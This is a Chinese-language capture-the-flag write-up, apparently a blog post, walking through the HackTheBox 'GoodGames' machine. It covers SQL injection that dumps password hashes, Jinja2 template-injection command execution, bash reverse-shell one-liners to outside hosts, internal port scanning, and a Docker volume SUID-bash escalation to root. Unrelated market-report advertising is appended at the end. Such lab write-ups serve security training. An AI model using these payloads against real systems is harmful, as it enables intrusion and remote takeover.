hackthebox-Tracks-CREST_CRT-GoodGame

端口扫描

sudo nmap -Pn -sS -A -v 10.129.222.145

设置hosts文件

feroxbuster

目录爆破

feroxbuster -u http://goodgames.htb/

靶场主页

在登录窗口下方有一个注册超链接

注册

登录抓包

尝试sql注入

查看输出个数

输出个数为4

可见输出是第四个

查看当前数据库名

查看所有数据库

两个数据库

information_schema 和 main

查看 main的表

查看user表的列

查看各列的内容

1==admin==admin@goodgames.htb==2b22337f218b2d82dfc3b6f77e7cb8ec

2==11==1@1.com==202cb962ac59075b964b07152d234b70

3==123==111@123.com==e10adc3949ba59abbe56e057f20f883e

尝试破解 2b22337f218b2d82dfc3b6f77e7cb8ec

superadministrator

在网页登录

在右上角设置处

跳转到子域名

将子域名添加到host文件中

继续跳转

尝试使用

admin/superadministrator

登录

在my profile中

可以自定义名称

由于是python语言,推测可能存在模板注入

验证模板注入

存在模板注入

构造payload

{{ config.__init__.__globals__.os.popen('id').read() }}

##__init__ 初始化类,返回的类型是function

##__globals__ 使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。

##os.popen() 方法用于从一个命令打开一个管道。

##open() 方法用于打开一个文件,并返回文件对象

成功执行命令

反弹shell

bash -i >& /dev/tcp/108.61.187.137/9999 0>&1

{{ config.__init__.__globals__.os.popen("bash -c 'bash -i >& /dev/tcp/10.10.16.6/4545 0>&1'").read() }}

获取普通用户flag

b75c63d0e47c3643531b22b6a0acb953

说明是在docker容器内

没有用户 augustus 或 id 为 1000 的用户在 /etc/passwd:

 

 

 

这表明此主目录已从主机挂载到容器中。mount确认

 

通过ping扫描C段

for i in {1..254}; do (ping -c 1 172.19.0.${i} | grep "bytes from" | grep -v "Unreachable" &); done;

发现存在172.19.0.1

猜测 172.19.0.1为docker主机

扫描端口

for port in {1..65535}; do echo > /dev/tcp/172.19.0.1/$port && echo "$port open"; done 2>/dev/null

打开了22和80端口

尝试使用augustus和密码superadministrator登录SSH

 

成功登录

目录与172.19.0.2的目录一致

b75c63d0e47c3643531b22b6a0acb953

查看有关docker的进程

尝试从主机创建一个test文件

同样出现在容器里

尝试从容器创建一个test1文件

同样出现在主机上且为root权限

主机复制 /bin/bash 到本路径下

cp /bin/bash ./

然后在容器中修改文件权限

回到主机

获取rootshell

./bash -p (-p 这样特权就不会被删除)

获取root用户flag

d9d0dfc0f958b38cc2129bd63bfd973d

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
东南亚位于我国倡导推进的“一带一路”海陆交汇地带,作为当今全球发展最为迅速的地区之一,近年来区域内生产总值实现了显著且稳定的增长。根据东盟主要经济体公布的最新数据,印度尼西亚2023年国内生产总值(GDP)增长5.05%;越南2023年经济增长5.05%;马来西亚2023年经济增速为3.7%;泰国2023年经济增长1.9%;新加坡2023年经济增长1.1%;柬埔寨2023年经济增速预计为5.6%。 东盟国家在“一带一路”沿线国家中的总体GDP经济规模、贸易总额与国外直接投资均为最大,因此有着举足轻重的地位和作用。当前,东盟与中国已互相成为双方最大的交易伙伴。中国-东盟贸易总额已从2013年的443亿元增长至 2023年合计超逾6.4万亿元,占中国外贸总值的15.4%。在过去20余年中,东盟国家不断在全球多变的格局里面临挑战并寻求机遇。2023东盟国家主要经济体受到国内消费、国外投资、货币政策、旅游业复苏、和大宗商品出口价企稳等方面的提振,经济显现出稳步增长态势和强韧性的潜能。 本调研报告旨在深度挖掘东南亚市场的增长潜力与发展机会,分析东南亚市场竞争态势、销售模式、客户偏好、整体市场营商环境,为国内企业出海开展业务提供客观参考意见。 本文核心内容: 市场空间:全球行业市场空间、东南亚市场发展空间。 竞争态势:全球份额,东南亚市场企业份额。 销售模式:东南亚市场销售模式、本地代理商 客户情况:东南亚本地客户及偏好分析 营商环境:东南亚营商环境分析 本文纳入的企业包括国外及印尼本土企业,以及相关上下游企业等,部分名单 QYResearch是全球知名的大型咨询公司,行业涵盖各高科技行业产业链细分市场,横跨如半导体产业链(半导体设备及零部件、半导体材料、集成电路、制造、封测、分立器件、传感器、光电器件)、光伏产业链(设备、硅料/硅片、电池片、组件、辅料支架、逆变器、电站终端)、新能源汽车产业链(动力电池及材料、电驱电控、汽车半导体/电子、整车、充电桩)、通信产业链(通信系统设备、终端设备、电子元器件、射频前端、光模块、4G/5G/6G、宽带、IoT、数字经济、AI)、先进材料产业链(金属材料、高分子材料、陶瓷材料、纳米材料等)、机械制造产业链(数控机床、工程机械、电气机械、3C自动化、工业机器人、激光、工控、无人机)、食品药品、医疗器械、农业等。邮箱:market@qyresearch.com

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值